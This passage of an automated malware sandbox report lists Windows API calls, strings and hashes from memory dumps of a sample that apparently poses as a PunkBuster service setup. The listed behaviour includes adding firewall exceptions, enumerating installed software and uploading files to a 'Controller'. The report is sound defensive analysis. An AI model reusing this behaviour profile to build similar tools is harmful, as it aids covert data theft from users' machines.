                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: 80000006$H_prolog
                                              • String ID: Add failed: 0x%08lx$CoCreateInstance failed: 0x%08lx$Message$SysAllocString failed: 0x%08lx$WindowsFirewallAppIsEnabled failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$put_Name failed: 0x%08lx$put_ProcessImageFileName failed: 0x%08lx
                                              • API String ID: 3040914479-3210245531
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$EnvironmentVariable$_wcschr
                                              • String ID:
                                              • API String ID: 3899193279-0
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 000D3E86
                                              • LoadLibraryA.KERNEL32(?), ref: 000D3EC8
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3EE8
                                              • FreeLibrary.KERNEL32(00000000), ref: 000D3EEF
                                              • LoadLibraryA.KERNEL32(?), ref: 000D3F27
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3F39
                                              • FreeLibrary.KERNEL32(00000000), ref: 000D3F40
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 000D3F4F
                                              • FreeLibrary.KERNEL32(00000000), ref: 000D3F66
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                              • API String ID: 2490988753-744132762
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Version
                                              • String ID: Win32s on Windows 3.1$Windows 2000 (build %lu$Windows 95$Windows 95 OSR2$Windows 98$Windows 98 SE$Windows 9x (%d.%d)$Windows ME$Windows NT %lu.%lu (build %lu$Windows Server 2003 (build %lu$Windows XP (build %lu$tfP
                                              • API String ID: 1889659487-1510680528
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 000DB846
                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000DB88A
                                              • RegCloseKey.ADVAPI32(?), ref: 000DBB54
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnumOpen
                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                              • API String ID: 1332880857-3714951968
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 000DCAE9
                                              • GetCursorPos.USER32(?), ref: 000DCAF8
                                              • SetForegroundWindow.USER32(?), ref: 000DCB01
                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 000DCB1B
                                              • Shell_NotifyIconA.SHELL32(00000002,00133B50), ref: 000DCB6C
                                              • ExitProcess.KERNEL32 ref: 000DCB74
                                              • CreatePopupMenu.USER32 ref: 000DCB7A
                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 000DCB8F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                              • String ID: Close
                                              • API String ID: 1657328048-3535843008
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$Info
                                              • String ID:
                                              • API String ID: 2509303402-0
                                              APIs
                                              • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00439B76
                                              • CreateIconIndirect.USER32(?), ref: 00439BD0
                                              • DeleteObject.GDI32(00000000), ref: 00439BD9
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00439C9E
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00439CA4
                                              • SelectObject.GDI32(00000000,?), ref: 00439CB3
                                              • SelectObject.GDI32(00000000,?), ref: 00439CBF
                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,008800C6), ref: 00439CEB
                                              • SelectObject.GDI32(00000000,?), ref: 00439CFB
                                              • SelectObject.GDI32(00000000,?), ref: 00439D07
                                              • DeleteDC.GDI32(00000000), ref: 00439D10
                                              • DeleteDC.GDI32(00000000), ref: 00439D13
                                              • CreateIconIndirect.USER32(?), ref: 00439D1A
                                              • DeleteObject.GDI32(?), ref: 00439D4C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$Create$DeleteSelect$CompatibleIconIndirect$Bitmap
                                              • String ID:
                                              • API String ID: 3399708936-0
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004C639C
                                              • _strlen.LIBCMT ref: 004C63BC
                                              • _strlen.LIBCMT ref: 004C63CB
                                              • _strlen.LIBCMT ref: 004C63EB
                                              • _strlen.LIBCMT ref: 004C63F8
                                              • _strlen.LIBCMT ref: 004C645E
                                              • GetStdHandle.KERNEL32(000000F4,00510140,00000000,?,00000000,00000000,00000000,00000000), ref: 004C6469
                                              • WriteFile.KERNEL32(00000000), ref: 004C6470
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: _strlen$File$HandleModuleNameWrite
                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                              • API String ID: 1978235431-4022980321
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00407261
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407283
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 004072F9
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407360
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407363
                                              Strings
                                              • Uninstall Canceled, xrefs: 00407368
                                              • Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service., xrefs: 00407312
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040729C
                                              • Uninstall canceled. WARNING: The service was *NOT* completely removed., xrefs: 00407375
                                              • PnkBstrA, xrefs: 004072F3
                                              • Message, xrefs: 0040728F
                                              • Installation Canceled, xrefs: 00407305
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Installation Canceled$Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service.$Message$PnkBstrA$Uninstall Canceled$Uninstall canceled. WARNING: The service was *NOT* completely removed.
                                              • API String ID: 4214099978-2742951679
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 001100B1
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F300
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F312
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F324
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F336
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F348
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F35A
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F36C
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F37E
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F390
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3A2
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3B4
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3C6
                                                • Part of subcall function 0010F2E3: _free.LIBCMT ref: 0010F3D8
                                              • _free.LIBCMT ref: 001100A6
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 001100C8
                                              • _free.LIBCMT ref: 001100DD
                                              • _free.LIBCMT ref: 001100E8
                                              • _free.LIBCMT ref: 0011010A
                                              • _free.LIBCMT ref: 0011011D
                                              • _free.LIBCMT ref: 0011012B
                                              • _free.LIBCMT ref: 00110136
                                              • _free.LIBCMT ref: 0011016E
                                              • _free.LIBCMT ref: 00110175
                                              • _free.LIBCMT ref: 00110192
                                              • _free.LIBCMT ref: 001101AA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 7eaa6494a5e5748df8229a9c30899b9c998a7723a219f6f81f6d8d8a1c9a63a3
                                              • Instruction ID: 3bcaaa749e574c989239fd734af71d0abfa6d22e5b6f79267ee36d5448a65757
                                              • Opcode Fuzzy Hash: 7eaa6494a5e5748df8229a9c30899b9c998a7723a219f6f81f6d8d8a1c9a63a3
                                              • Instruction Fuzzy Hash: C7315E31A00704EFDB26AA38D845B9A73E9AF18360F148429F488E7195DFB5EDE4CB10
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 000C7F4C
                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 000C7FC2
                                              • __aulldiv.LIBCMT ref: 000C7FE9
                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 000C810D
                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 000C8128
                                              • CloseHandle.KERNEL32(00000000), ref: 000C8200
                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 000C821A
                                              • CloseHandle.KERNEL32(00000000), ref: 000C8256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                              • API String ID: 1884690901-2596673759
                                              • Opcode ID: 19ee2f8f805bf42f7ad5ac57d232465005bdfc46b33a3e07e1a7902f43335212
                                              • Instruction ID: 4932fb7ce92c58bbca9c57dc21b266de415c5d3193ed164bd017d1a9a763853c
                                              • Opcode Fuzzy Hash: 19ee2f8f805bf42f7ad5ac57d232465005bdfc46b33a3e07e1a7902f43335212
                                              • Instruction Fuzzy Hash: 81B17F316083409BC758FB24D892FEFB7E5AF95310F50491DF88A92293EF70994ACB56
                                              APIs
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,00000000,004E9570,00000120), ref: 0040833E
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00408351
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,?), ref: 00408374
                                              • LocalFree.KERNEL32(?), ref: 004083A4
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 004083B9
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004083C8
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 004083E6
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408423
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408436
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CertNameStringTime$Local$AllocFileSystem$Free
                                              • String ID: %02x $Too Large
                                              • API String ID: 1769289905-1084305061
                                              • Opcode ID: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction ID: 6f341e6902c4afdf672d8c9355eb800609bd8c5a6837686ba94cd697f7e6a9e9
                                              • Opcode Fuzzy Hash: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction Fuzzy Hash: 4E51327194025AAFDB219F64CC81FEDB7F8AF08354F0444BAF988A7291D6749E908F58
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040997A
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00409A16
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 00409AB5
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00409B16
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00409B1E
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004099C1
                                              • Battlefield Bad Company 2, xrefs: 004099A3
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 00409A47
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004099BA
                                              • PnkBstrA, xrefs: 00409AAF
                                              • Message, xrefs: 00409A37
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Battlefield Bad Company 2$Message$PnkBstrA$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3
                                              • API String ID: 4214099978-78031187
                                              • Opcode ID: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction ID: 2e18fc910cd73181aa8cc253c752e22f79e2d0258fc9b51ea5b6ac68f69cd406
                                              • Opcode Fuzzy Hash: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction Fuzzy Hash: EE4173B0A402589FD710EB65CC85FEA77B4AF58304F0040BEF50AA7292DB795E85CB69
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9C94
                                              • OpenServiceW.ADVAPI32(00000000,00000000,,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CAB
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CB8
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CC7
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CD8
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,000D95F8,00000000,00000000), ref: 000D9CDB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-2599400749
                                              • Opcode ID: e9c4cbff891173bb4475f04e4c7d68e912d5bde066e867556522667cc7f5565d
                                              • Instruction ID: da515d60c9f8dda882935b478f7f8fcc99bb7c43b913ccc55f38d214a0706dbc
                                              • Opcode Fuzzy Hash: e9c4cbff891173bb4475f04e4c7d68e912d5bde066e867556522667cc7f5565d
                                              • Instruction Fuzzy Hash: 2911A932945318AFD72567649D85EFF3FBCDB4B760B004016F505922C1DB64CD46AAB1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: fa515c3bcacbb2a211df377003f5940c6053c00fb3539ad6c891feaf6d9a1dcc
                                              • Instruction ID: 2ed50f9e91c1ec3a4a93ba56190c4f61c54127c8ae3a4e739dd5389a738a2004
                                              • Opcode Fuzzy Hash: fa515c3bcacbb2a211df377003f5940c6053c00fb3539ad6c891feaf6d9a1dcc
                                              • Instruction Fuzzy Hash: 6AC13576E40209BBDB20DBA8CC43FDAB7F89B18700F144165FA45FB2C6D7B099818B94
                                              APIs
                                              • DeleteObject.GDI32(?), ref: 0043976E
                                              • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004397DF
                                              • CreateCompatibleDC.GDI32(00000000), ref: 004397F0
                                              • CreateCompatibleDC.GDI32(00000000), ref: 004397F6
                                              • SelectObject.GDI32(00000000,00000000), ref: 00439811
                                              • SelectObject.GDI32(00000000,?), ref: 00439828
                                              • SetBkColor.GDI32(00000000,00000000), ref: 00439842
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 00439861
                                              • SelectObject.GDI32(00000000,?), ref: 0043986D
                                              • DeleteDC.GDI32(00000000), ref: 00439876
                                              • SelectObject.GDI32(00000000,?), ref: 0043987E
                                              • DeleteDC.GDI32(00000000), ref: 00439881
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$Select$CreateDelete$Compatible$BitmapColor
                                              • String ID:
                                              • API String ID: 405077169-0
                                              • Opcode ID: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction ID: 49661b4580e29581968163e5db868791f49a386c690e782eba182ce59999159b
                                              • Opcode Fuzzy Hash: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction Fuzzy Hash: AA417935644350AFD300DF54D884F6BBBE8BB8DB00F14855AF9889B342C7B8EC058BA6
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C47FD
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4808
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4811
                                              • closesocket.WS2_32(000000FF), ref: 000C481F
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4856
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C4867
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C486E
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C4880
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C4885
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C488A
                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C4895
                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,000C4B8E,?,?,?,000C4B26), ref: 000C489A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
